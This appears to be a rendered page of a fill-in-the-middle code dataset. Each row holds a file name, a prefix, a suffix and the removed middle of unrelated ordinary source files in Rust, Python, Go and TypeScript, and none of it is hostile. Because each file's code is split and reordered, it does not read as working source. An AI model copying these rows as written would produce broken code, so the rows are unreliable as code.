Self::from_conf(sdk_config.into())
}
/// Creates a new client from the service [`Config`](crate::Config).
#[cfg(any(feature = "rustls", feature = "native-tls"))]
pub fn from_conf(conf: crate::Config) -> Self {
let retry_config = conf.retry_config.as_ref().cloned().unwrap_or_default();
let timeout_config = conf.timeout_config.as_ref().cloned().unwrap_or_default();
let sleep_impl = conf.sleep_impl.clone();
let mut builder = aws_smithy_client::Builder::dyn_https().middleware(
aws_smithy_client::erase::DynMiddleware::new(
crate::middleware::DefaultMiddleware::new(),
),
);
builder.set_retry_config(retry_config.into());
builder.set_timeout_config(timeout_config);
// the builder maintains a try-state. To avoid suppressing the warning when sleep is unset,
// only set it if we actually have a sleep impl.
if let Some(sleep_impl) = sleep_impl {
builder.set_sleep_impl(Some(sleep_impl));
}
let client = builder.build();
Self {
handle: std::sync::Arc::new(Handle { client, conf }),
}
}
} | /// - [`hls_ingest(Option<HlsIngest>)`](crate::output::RotateChannelCredentialsOutput::hls_ingest): An HTTP Live Streaming (HLS) ingest resource configuration.
/// - [`id(Option<String>)`](crate::output::RotateChannelCredentialsOutput::id): The ID of the Channel.
/// - [`ingress_access_logs(Option<IngressAccessLogs>)`](crate::output::RotateChannelCredentialsOutput::ingress_access_logs): Configure ingress access logging. |
speech_transcribe_async.py | #!/usr/bin/env python
# Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
| from google.cloud.speech import types
def long_running_recognize_gcs(
gcs_uri='gs://cloud-sample-data/speech/brooklyn.raw',
language_code='en-US'
):
"""Asynchronously transcribes the audio file specified by the gcs_uri.
Args:
gcs_uri: Path to audio file in Google Cloud Storage
e.g. gs://BUCKET/FILE
language_code: The language of the supplied audio as
a BCP-47 language tag, e.g. 'en-US'
"""
client = speech.SpeechClient()
audio = types.RecognitionAudio(uri=gcs_uri)
config = types.RecognitionConfig(
# This is a comment describing one of the fields being set
encoding=enums.RecognitionConfig.AudioEncoding.FLAC,
sample_rate_hertz=16000,
language_code=language_code)
operation = client.long_running_recognize(config, audio)
print('Waiting for operation to complete...')
response = operation.result(timeout=90)
# Each result is for a consecutive portion of the audio. Iterate through
# them to get the transcripts for the entire audio file.
for result in response.results:
# The first alternative is the most likely one for this portion.
print(u'Transcript: {}'.format(result.alternatives[0].transcript))
print('Confidence: {}'.format(result.alternatives[0].confidence))
# [END speech_transcribe_async_gcs]
# import argparse | # [START speech_transcribe_async_gcs]
from google.cloud import speech
from google.cloud.speech import enums |
_globals.py | #
# Python Macro Language for Dragon NaturallySpeaking
# (c) Copyright 1999 by Joel Gould
# Portions (c) Copyright 1999 by Dragon Systems, Inc.
#
# _glogals.py
# Sample macro file which is active all the time (not application specific).
#
# April 25, 1999
# - packaged for external release
#
# March 3, 1999
# - initial version
#
############################################################################
#
# This is a sample grammar file. I have implemented some basic global
# commands for example purposes.
#
# This file is loaded automatically when the Python subsystem starts because
# its filename begins with an underscore (the signal for a global module).
#
# Please see the example wordpad.py for more comments.
#
import natlink
from natlinkutils import *
class ThisGrammar(GrammarBase):
# We create a simple grammar to illustrate a couple of basic ideas.
# You can say "Python microphone off" or "Python go to sleep" which
# have exactly the same effect as "microphone off" and "go to sleep".
#
# You can also say "Python stop listening" which simulates sleeping
# by putting the system into a state where the only thing which will
# be recognized is "Python start listening"
testGram = """
<micOff> = Python microphone off;
<sleep> = Python go to sleep;
<stop> = Python stop listening;
<notListening> exported = Python start listening;
<normalState> exported = <micOff> | <sleep> | <stop>;
"""
# Load the grammar and activate the rule "normalState". We use
# activateSet instead of activate because activateSet is an efficient
# way of saying "deactivateAll" then "activate(xxx)" for every xxx
# in the array.
def initialize(self):
|
# When words are recognized from the rule "micOff", this function gets
# called. We turn the microphone off.
def gotResults_micOff(self,words,fullResults):
natlink.setMicState('off')
# When words are recognized from the rule "sleep", this function gets
# called. We put the microphone in the speeling state. This will
# cause the built-in NatSpeak global commands module to activate a
# special "wake-up" state in exclusive mode. We have no control
# over this (although we could activate our own exclusive rule at the
# same time).
def gotResults_sleep(self,words,fullResults):
natlink.setMicState('sleeping')
# For the rule "stop", we activate the "notListening" rule which
# contains only one subrule. We also force exclusive state for this
# grammar which turns off all other non-exclusive grammar in the system.
def gotResults_stop(self,words,fullResults):
self.activateSet(['notListening'],exclusive=1)
# When we get "start listening", restore the default state of this
# grammar.
def gotResults_notListening(self,words,fullResults):
self.activateSet(['normalState'],exclusive=0)
#
# Here is the initialization and termination code. See wordpad.py for more
# comments.
#
thisGrammar = ThisGrammar()
thisGrammar.initialize()
def unload():
global thisGrammar
if thisGrammar: thisGrammar.unload()
thisGrammar = None
| self.load(self.testGram)
self.activateSet(['normalState'])
self.setExclusive(0) |
codegen.rs | use codegen_rs::*;
#[test]
fn empty_scope() {
let scope = Scope::new();
assert_eq!(scope.to_string(), "");
}
#[test]
fn single_struct() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.field("one", "usize")
.field("two", "String");
let expect = r#"
struct Foo {
one: usize,
two: String,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_pushed_field() {
let mut scope = Scope::new();
let mut struct_ = Struct::new("Foo");
let field = Field::new("one", "usize");
struct_.push_field(field);
scope.push_struct(struct_);
let expect = r#"
struct Foo {
one: usize,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn single_struct_documented_field() {
let mut scope = Scope::new();
let doc = vec!["Field's documentation", "Second line"];
let mut struct_ = Struct::new("Foo");
let mut field1 = Field::new("one", "usize");
field1.doc(doc.clone());
struct_.push_field(field1);
let mut field2 = Field::new("two", "usize");
field2.annotation(vec![r#"#[serde(rename = "bar")]"#]);
struct_.push_field(field2);
let mut field3 = Field::new("three", "usize");
field3.doc(doc).annotation(vec![
r#"#[serde(skip_serializing)]"#,
r#"#[serde(skip_deserializing)]"#,
]);
struct_.push_field(field3);
scope.push_struct(struct_);
let expect = r#"
struct Foo {
/// Field's documentation
/// Second line
one: usize,
#[serde(rename = "bar")]
two: usize,
/// Field's documentation
/// Second line
#[serde(skip_serializing)]
#[serde(skip_deserializing)]
three: usize,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn single_fn() {
let mut scope = Scope::new();
scope
.new_fn("my_fn")
.vis("pub")
.arg("foo", Type::new("uint"))
.ret(Type::new("uint"))
.line("let res = foo + 1;")
.line("res");
let expect = r#"
pub fn my_fn(foo: uint) -> uint {
let res = foo + 1;
res
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn empty_struct() {
let mut scope = Scope::new();
scope.new_struct("Foo");
let expect = r#"
struct Foo;"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn two_structs() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.field("one", "usize")
.field("two", "String");
scope.new_struct("Bar").field("hello", "World");
let expect = r#"
struct Foo {
one: usize,
two: String,
}
struct Bar {
hello: World,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_derive() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.derive("Debug")
.derive("Clone")
.field("one", "usize")
.field("two", "String");
let expect = r#"
#[derive(Debug, Clone)]
struct Foo {
one: usize,
two: String,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_repr() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.repr("C")
.field("one", "u8")
.field("two", "u8");
let expect = r#"
#[repr(C)]
struct Foo {
one: u8,
two: u8,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_allow() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.allow("dead_code")
.field("one", "u8")
.field("two", "u8");
let expect = r#"
#[allow(dead_code)]
struct Foo {
one: u8,
two: u8,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_generics_1() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.generic("T")
.generic("U")
.field("one", "T")
.field("two", "U");
let expect = r#"
struct Foo<T, U> {
one: T,
two: U,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_generics_2() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.generic("T, U")
.field("one", "T")
.field("two", "U");
let expect = r#"
struct Foo<T, U> {
one: T,
two: U,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_generics_3() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.generic("T: Win, U")
.field("one", "T")
.field("two", "U");
let expect = r#"
struct Foo<T: Win, U> {
one: T,
two: U,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_where_clause_1() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.generic("T")
.bound("T", "Foo")
.field("one", "T");
let expect = r#"
struct Foo<T>
where T: Foo,
{
one: T,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_where_clause_2() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.generic("T, U")
.bound("T", "Foo")
.bound("U", "Baz")
.field("one", "T")
.field("two", "U");
let expect = r#"
struct Foo<T, U>
where T: Foo,
U: Baz,
{
one: T,
two: U,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_doc() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.doc(
"Hello, this is a doc string\n\
that continues on another line.",
)
.field("one", "T");
let expect = r#"
/// Hello, this is a doc string
/// that continues on another line.
struct Foo {
one: T,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_in_mod() {
let mut scope = Scope::new();
{
let module = scope.new_module("foo");
module
.new_struct("Foo")
.doc("Hello some docs")
.derive("Debug")
.generic("T, U")
.bound("T", "SomeBound")
.bound("U", "SomeOtherBound") |
let expect = r#"
mod foo {
/// Hello some docs
#[derive(Debug)]
struct Foo<T, U>
where T: SomeBound,
U: SomeOtherBound,
{
one: T,
two: U,
}
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_mod_import() {
let mut scope = Scope::new();
scope
.new_module("foo")
.import("bar", "Bar")
.new_struct("Foo")
.field("bar", "Bar");
let expect = r#"
mod foo {
use bar::Bar;
struct Foo {
bar: Bar,
}
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn enum_with_repr() {
let mut scope = Scope::new();
scope
.new_enum("IpAddrKind")
.repr("u8")
.push_variant(Variant::new("V4"))
.push_variant(Variant::new("V6"));
let expect = r#"
#[repr(u8)]
enum IpAddrKind {
V4,
V6,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn enum_with_allow() {
let mut scope = Scope::new();
scope
.new_enum("IpAddrKind")
.allow("dead_code")
.push_variant(Variant::new("V4"))
.push_variant(Variant::new("V6"));
let expect = r#"
#[allow(dead_code)]
enum IpAddrKind {
V4,
V6,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn enum_with_non_exhaustive() {
let mut scope = Scope::new();
let ip_addr_kind_enum = scope
.new_enum("IpAddrKind")
.push_variant(Variant::new("V4"))
.push_variant(Variant::new("V6"));
ip_addr_kind_enum
.type_def_mut()
.r#macro("#[non_exhaustive]");
let expect = r#"
#[non_exhaustive]
enum IpAddrKind {
V4,
V6,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn enum_with_variant_doc() {
let mut scope = Scope::new();
let mut v = Variant::new("V4");
v.doc("best");
scope
.new_enum("IpAddrKind")
.push_variant(v)
.push_variant(Variant::new("V6"));
let expect = r#"
enum IpAddrKind {
/// best
V4,
V6,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn scoped_imports() {
let mut scope = Scope::new();
scope
.new_module("foo")
.import("bar", "Bar")
.import("bar", "baz::Baz")
.import("bar::quux", "quuux::Quuuux")
.new_struct("Foo")
.field("bar", "Bar")
.field("baz", "baz::Baz")
.field("quuuux", "quuux::Quuuux");
let expect = r#"
mod foo {
use bar::{Bar, baz};
use bar::quux::quuux;
struct Foo {
bar: Bar,
baz: baz::Baz,
quuuux: quuux::Quuuux,
}
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn module_mut() {
let mut scope = Scope::new();
scope.new_module("foo").import("bar", "Bar");
scope
.get_module_mut("foo")
.expect("module_mut")
.new_struct("Foo")
.field("bar", "Bar");
let expect = r#"
mod foo {
use bar::Bar;
struct Foo {
bar: Bar,
}
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn get_or_new_module() {
let mut scope = Scope::new();
assert!(scope.get_module("foo").is_none());
scope.get_or_new_module("foo").import("bar", "Bar");
scope
.get_or_new_module("foo")
.new_struct("Foo")
.field("bar", "Bar");
let expect = r#"
mod foo {
use bar::Bar;
struct Foo {
bar: Bar,
}
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn function_with_async() {
let mut scope = Scope::new();
let trt = scope.new_trait("Foo");
let f = trt.new_fn("pet_toby");
f.set_async(true);
f.line("println!(\"petting toby because he is a good boi\");");
let expect = r#"
trait Foo {
async fn pet_toby() {
println!("petting toby because he is a good boi");
}
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn trait_with_macros() {
let mut scope = Scope::new();
let trt = scope.new_trait("Foo");
trt.r#macro("#[async_trait]");
trt.r#macro("#[toby_is_cute]");
let f = trt.new_fn("pet_toby");
f.set_async(true);
f.line("println!(\"petting toby because he is a good boi\");");
let expect = r#"
#[async_trait]
#[toby_is_cute]
trait Foo {
async fn pet_toby() {
println!("petting toby because he is a good boi");
}
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn impl_with_macros() {
let mut scope = Scope::new();
scope.new_struct("Bar");
let imp = scope.new_impl("Bar");
imp.impl_trait("Foo");
imp.r#macro("#[async_trait]");
imp.r#macro("#[toby_is_cute]");
let f = imp.new_fn("pet_toby");
f.set_async(true);
f.line("println!(\"petting Toby many times because he is such a good boi\");");
let expect = r#"
struct Bar;
#[async_trait]
#[toby_is_cute]
impl Foo for Bar {
async fn pet_toby() {
println!("petting Toby many times because he is such a good boi");
}
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_multiple_allow() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.allow("dead_code")
.allow("clippy::all")
.field("one", "u8")
.field("two", "u8");
let expect = r#"
#[allow(dead_code)]
#[allow(clippy::all)]
struct Foo {
one: u8,
two: u8,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn enum_with_multiple_allow() {
let mut scope = Scope::new();
scope
.new_enum("IpAddrKind")
.allow("dead_code")
.allow("clippy::all")
.push_variant(Variant::new("V4"))
.push_variant(Variant::new("V6"));
let expect = r#"
#[allow(dead_code)]
#[allow(clippy::all)]
enum IpAddrKind {
V4,
V6,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
} | .field("one", "T")
.field("two", "U");
} |
category-list-item.component.ts | import {Component, ViewEncapsulation, ChangeDetectionStrategy, Input, Output, EventEmitter} from '@angular/core';
import {CategoryModalComponent} from '../../category-modal/category-modal.component';
import {Category} from '../../../../shared/models/Category';
import {CategoriesService} from '../../../shared/categories.service';
import {Router} from '@angular/router';
import {LocalStorage} from '@common/core/services/local-storage.service';
import {Modal} from '@common/core/ui/dialogs/modal.service';
import {ConfirmModalComponent} from '@common/core/ui/confirm-modal/confirm-modal.component';
@Component({
selector: 'category-list-item',
templateUrl: './category-list-item.component.html',
styleUrls: ['./category-list-item.component.scss'],
encapsulation: ViewEncapsulation.None,
changeDetection: ChangeDetectionStrategy.OnPush,
})
export class | {
constructor(
private modal: Modal,
private api: CategoriesService,
private router: Router,
private storage: LocalStorage,
) {}
/**
* Help center category model instance.
*/
@Input() public category: Category;
/**
* Fired when this category model changes or is deleted.
*/
@Output() public onChange = new EventEmitter();
/**
* Show modal for creating child category.
*/
public openCreateChildCategoryModal() {
this.modal.show(CategoryModalComponent, {parentId: this.category.id})
.afterClosed().subscribe(() => this.onChange.emit());
}
/**
* Show modal for updating specified category.
*/
public openUpdateCategoryModal(category: Category) {
this.modal.show(CategoryModalComponent, {category})
.afterClosed().subscribe(() => this.onChange.emit());
}
/**
* Delete specified category if user confirms.
*/
public maybeDeleteCategory(id: number) {
this.modal.show(ConfirmModalComponent, {
title: 'Delete Category',
body: 'Are you sure you want to delete this category?',
bodyBold: 'Children of this category will not be deleted.',
ok: 'Delete'
}).afterClosed().subscribe(confirmed => {
if ( ! confirmed) return;
this.api.deleteCategory(id).subscribe(() => this.onChange.emit());
});
}
/**
* Detach specified category from parent if user confirms.
*/
public maybeDetachCategory(id: number) {
this.modal.show(ConfirmModalComponent, {
title: 'Detach Category',
body: 'Are you sure you want to detach this category from its parent?',
ok: 'Detach'
}).afterClosed().subscribe(confirmed => {
if ( ! confirmed) return;
this.api.detachCategory(id).subscribe(() => this.onChange.emit());
});
}
/**
* Select specified category and navigate to articles list route.
*/
public navigateToArticlesList(category: Category) {
const ids = [category.id];
if (category.parent_id) ids.push(category.parent_id);
this.storage.set('selectedCategories', ids);
this.router.navigate(['/help-center/manage/articles']);
}
}
| CategoryListItemComponent |
admin.go | // Copyright 2017 fatedier, [email protected]
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software |
package client
import (
"fmt"
"net"
"net/http"
"time"
"github.com/fatedier/frp/models/config"
frpNet "github.com/fatedier/frp/utils/net"
"github.com/julienschmidt/httprouter"
)
var (
httpServerReadTimeout = 10 * time.Second
httpServerWriteTimeout = 10 * time.Second
)
func (svr *Service) RunAdminServer(addr string, port int64) (err error) {
// url router
router := httprouter.New()
user, passwd := config.ClientCommonCfg.AdminUser, config.ClientCommonCfg.AdminPwd
// api, see dashboard_api.go
router.GET("/api/reload", frpNet.HttprouterBasicAuth(svr.apiReload, user, passwd))
address := fmt.Sprintf("%s:%d", addr, port)
server := &http.Server{
Addr: address,
Handler: router,
ReadTimeout: httpServerReadTimeout,
WriteTimeout: httpServerWriteTimeout,
}
if address == "" {
address = ":http"
}
ln, err := net.Listen("tcp", address)
if err != nil {
return err
}
go server.Serve(ln)
return
} | // distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License. |
base.py | """
FUNÇÕES BÁSICAS PARA O PROGRAMA
"""
from time import sleep
# Imprimir caracter especial
def linha(tam=40):
print(f"{'='*tam}")
# Recebe e valida um nome
def ler | t):
stop = True
while stop:
stop = False
nome = input(txt).strip()
lista_nome = nome.split()
if len(lista_nome) == 0:
print("ERRO! Você digitou um nome vazio...")
sleep(1)
stop = True
else:
for valor in lista_nome:
# Verifica se o nome contém conteúdo não alfabético
if not valor.isalpha():
print("ERRO! Você digitou um nome inválido...")
sleep(1)
stop = True
nome = " ".join(lista_nome)
return nome
# Recebe e valida um número inteiro
def ler_inteiro(txt=""):
# Caso o texto seja vazio, exibe uma mensagem default
if txt == "":
txt = "Digite o valor de um número inteiro"
while True:
try:
inteiro = int(input(txt))
except (KeyboardInterrupt):
print("ERRO! Entrada de dados interrompida pelo usuário!")
inteiro = 0
break
except(ValueError):
print("ERRO! Você digitou um valor inteiro inválido...")
sleep(1)
except: # Demais erros
print("ERRO! O programa teve um erro durante a leitura...")
sleep(1)
else:
break
return inteiro
# Recebe e valida uma idade
def ler_idade(txt):
if txt == "":
txt = "Digite o valor da idade"
while True:
idade = ler_inteiro(txt)
if idade < 0:
print("ERRO! Você digitou uma valor negativo...")
sleep(1)
else:
break
return idade | _nome(tx |
display_apps.py | import sqlite3
import os
def sql_connection():
"""
Establishes a connection to the SQL file database
:return connection object:
"""
path = os.path.abspath('PlaystoreDatabase.db')
con = sqlite3.connect(path)
return con
def sql_fetcher(con):
"""
Fetches all the with the given query from our database
:param con:
:return:
"""
query = input("\nEnter query to search: r/")
count = 0
cur = con.cursor()
cur.execute('SELECT * FROM apps') # SQL search query
rows = cur.fetchall()
for r in rows:
if query in r:
count += 1
print(f'\nURL: {r[1]}\nNAME: {r[2]}\nRATING: {r[3]}\n'
f'REVIEWS: {r[4]}\nINSTALLS: {r[5]}\nVERSION: {r[6]}'
f'\nLASTUPDATE: {r[7]}\nCOMPANY: {r[8]}\nCONTACT: {r[9]}')
if count:
print(f'{count} posts fetched from database\n')
else:
print('\nNo posts stored for this query\n')
con = sql_connection()
while 1:
sql_fetcher(con)
ans = input('\nPress (y) to continue or any other key to exit: ').lower()
if ans == 'y':
continue
else:
| print('\nExiting..\n')
break |
|
map_test.go | package stick
import (
"encoding/json"
"testing"
"github.com/stretchr/testify/assert"
"go.mongodb.org/mongo-driver/bson"
)
func TestMap(t *testing.T) {
type child struct {
Body string `json:"the-body"`
}
type parent struct {
Title string `json:"title"`
Data Map `json:"data"`
}
input := &parent{
Title: "foo",
Data: MustMap(child{Body: "body"}, JSON),
}
bytes1, err := json.Marshal(input)
assert.NoError(t, err)
assert.Equal(t, `{"title":"foo","data":{"the-body":"body"}}`, string(bytes1))
var output1 parent
err = json.Unmarshal(bytes1, &output1)
assert.NoError(t, err)
assert.Equal(t, parent{
Title: "foo",
Data: Map{
"the-body": "body",
},
}, output1)
var ch1 child
output1.Data.MustUnmarshal(&ch1, JSON)
assert.Equal(t, child{Body: "body"}, ch1)
bytes2, err := bson.Marshal(input)
assert.NoError(t, err)
var output2 parent
err = bson.Unmarshal(bytes2, &output2)
assert.NoError(t, err)
assert.Equal(t, parent{
Title: "foo",
Data: Map{
"the-body": "body",
},
}, output2)
var ch2 child
output2.Data.MustUnmarshal(&ch2, JSON)
assert.Equal(t, child{Body: "body"}, ch2)
}
func TestMapFlat(t *testing.T) | {
m := Map{
"foo": "bar",
"bar": Map{
"foo": "bar",
},
"baz": map[string]interface{}{
"foo": "bar",
},
}
assert.Equal(t, Map{
"foo": "bar",
"bar_foo": "bar",
"baz_foo": "bar",
}, m.Flat("_"))
} |
|
functions1.rs | // functions1.rs
// Make me compile! Scroll down for hints :)
fn main() {
call_me();
}
fn call_me(){
println!("Done!")
}
|
// This main function is calling a function that it expects to exist, but the
// function doesn't exist. It expects this function to have the name `call_me`.
// It expects this function to not take any arguments and not return a value.
// Sounds a lot like `main`, doesn't it? | |
repo_branch.go | // Copyright 2015 The Gogs Authors. All rights reserved.
// Use of this source code is governed by a MIT-style
// license that can be found in the LICENSE file.
package git
import (
"fmt"
"strings"
"github.com/mcuadros/go-version"
)
const BRANCH_PREFIX = "refs/heads/"
// IsReferenceExist returns true if given reference exists in the repository.
func | (repoPath, name string) bool {
_, err := NewCommand("show-ref", "--verify", name).RunInDir(repoPath)
return err == nil
}
// IsBranchExist returns true if given branch exists in the repository.
func IsBranchExist(repoPath, name string) bool {
return IsReferenceExist(repoPath, BRANCH_PREFIX+name)
}
func (repo *Repository) IsBranchExist(name string) bool {
return IsBranchExist(repo.Path, name)
}
// Branch represents a Git branch.
type Branch struct {
Name string
Path string
}
// GetHEADBranch returns corresponding branch of HEAD.
func (repo *Repository) GetHEADBranch() (*Branch, error) {
stdout, err := NewCommand("symbolic-ref", "HEAD").RunInDir(repo.Path)
if err != nil {
return nil, err
}
stdout = strings.TrimSpace(stdout)
if !strings.HasPrefix(stdout, BRANCH_PREFIX) {
return nil, fmt.Errorf("invalid HEAD branch: %v", stdout)
}
return &Branch{
Name: stdout[len(BRANCH_PREFIX):],
Path: stdout,
}, nil
}
// SetDefaultBranch sets default branch of repository.
func (repo *Repository) SetDefaultBranch(name string) error {
if version.Compare(gitVersion, "1.7.10", "<") {
return ErrUnsupportedVersion{"1.7.10"}
}
_, err := NewCommand("symbolic-ref", "HEAD", BRANCH_PREFIX+name).RunInDir(repo.Path)
return err
}
// GetBranches returns all branches of the repository.
func (repo *Repository) GetBranches() ([]string, error) {
stdout, err := NewCommand("show-ref", "--heads").RunInDir(repo.Path)
if err != nil {
return nil, err
}
infos := strings.Split(stdout, "\n")
branches := make([]string, len(infos)-1)
for i, info := range infos[:len(infos)-1] {
fields := strings.Fields(info)
if len(fields) != 2 {
continue // NOTE: I should believe git will not give me wrong string.
}
branches[i] = strings.TrimPrefix(fields[1], BRANCH_PREFIX)
}
return branches, nil
}
// Option(s) for delete branch
type DeleteBranchOptions struct {
Force bool
}
// DeleteBranch delete a branch by name on repository.
func (repo *Repository) DeleteBranch(name string, opts DeleteBranchOptions) error {
cmd := NewCommand("branch", "-d")
if opts.Force {
cmd.AddArguments("-f")
}
cmd.AddArguments(name)
_, err := cmd.RunInDir(repo.Path)
return err
}
// AddRemote adds a new remote to repository.
func (repo *Repository) AddRemote(name, url string, fetch bool) error {
cmd := NewCommand("remote", "add")
if fetch {
cmd.AddArguments("-f")
}
cmd.AddArguments(name, url)
_, err := cmd.RunInDir(repo.Path)
return err
}
// RemoveRemote removes a remote from repository.
func (repo *Repository) RemoveRemote(name string) error {
_, err := NewCommand("remote", "remove", name).RunInDir(repo.Path)
return err
}
| IsReferenceExist |
Broken.js | import React from 'react'
import SvgIcon from '@material-ui/core/SvgIcon'
function | (props) {
return (
<SvgIcon {...props}>
<path d="M12.604 15.233l-3.5 3.44L11.473 21H5c-1.102 0-2-.9-2-2V5c0-1.1.899-2 2-2h6.05L9.105 4.914l3.5 3.44-3.5 3.44 3.5 3.44zM19 3c1.1 0 2 .9 2 2v14c0 1.1-.9 2-2 2h-4.675l-2.367-2.327 3.5-3.44-3.5-3.44 3.5-3.439-3.5-3.44L13.905 3H19z" />
</SvgIcon>
)
}
export { Broken }
| Broken |
order_item.go | package model
type OrderItem struct {
Id int64 `gorm:"column:id" json:"id"`
OrderId int64 `gorm:"column:order_id" json:"orderId"`
ProductId int64 `gorm:"column:product_id" json:"productId"`
ProductSkuId int64 `gorm:"column:product_sku_id" json:"productSkuId"` | Title string `gorm:"column:title" json:"title"`
Image string `gorm:"column:image" json:"image"`
}
func (OrderItem) TableName() string {
return "order_items"
} | Amount int64 `gorm:"column:amount" json:"amount"`
Price int64 `gorm:"column:price" json:"price"` |
datagrid.module.ts | /*!
* Copyright 2019 VMware, Inc.
* SPDX-License-Identifier: BSD-2-Clause
*/
import { CommonModule } from '@angular/common';
import { NgModule } from '@angular/core';
import { FormsModule, ReactiveFormsModule } from '@angular/forms';
import { RouterModule } from '@angular/router';
import { ClarityModule } from '@clr/angular';
import { I18nModule } from '@vcd/i18n';
import { VcdActionMenuModule } from '../action-menu/action-menu.module';
import { VcdActivityReporterModule } from '../common/activity-reporter/activity-reporter.module';
import { PipesModule } from '../common/pipes/pipes.module';
import { VcdFormModule } from '../form/form.module';
import { ShowClippedTextDirectiveModule } from '../lib/directives/show-clipped-text.directive.module';
import { DatagridComponent } from './datagrid.component';
import { VcdComponentRendererOutletModule } from './directives/component-renderer-outlet.module';
import { DatagridMultiSelectFilterComponent } from './filters/datagrid-multiselect-filter.component';
import { DatagridNumericFilterComponent } from './filters/datagrid-numeric-filter.component';
import { DatagridSelectFilterComponent } from './filters/datagrid-select-filter.component';
import { DatagridStringFilterComponent } from './filters/datagrid-string-filter.component';
import { FunctionRendererPipe } from './pipes/function-renderer.pipe';
import { BoldTextRendererComponent } from './renderers/bold-text-renderer.component';
const pipes = [FunctionRendererPipe];
const renderers = [BoldTextRendererComponent];
const filters = [
DatagridNumericFilterComponent,
DatagridStringFilterComponent,
DatagridSelectFilterComponent,
DatagridMultiSelectFilterComponent, | imports: [
CommonModule,
ClarityModule,
RouterModule,
PipesModule,
ReactiveFormsModule,
ShowClippedTextDirectiveModule,
FormsModule,
I18nModule,
VcdActivityReporterModule,
VcdFormModule,
VcdActionMenuModule,
VcdComponentRendererOutletModule,
],
declarations: [DatagridComponent, ...renderers, ...pipes, ...filters],
providers: [],
exports: [DatagridComponent, ...renderers],
entryComponents: [...renderers, ...filters],
})
export class VcdDatagridModule {} | ];
@NgModule({ |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.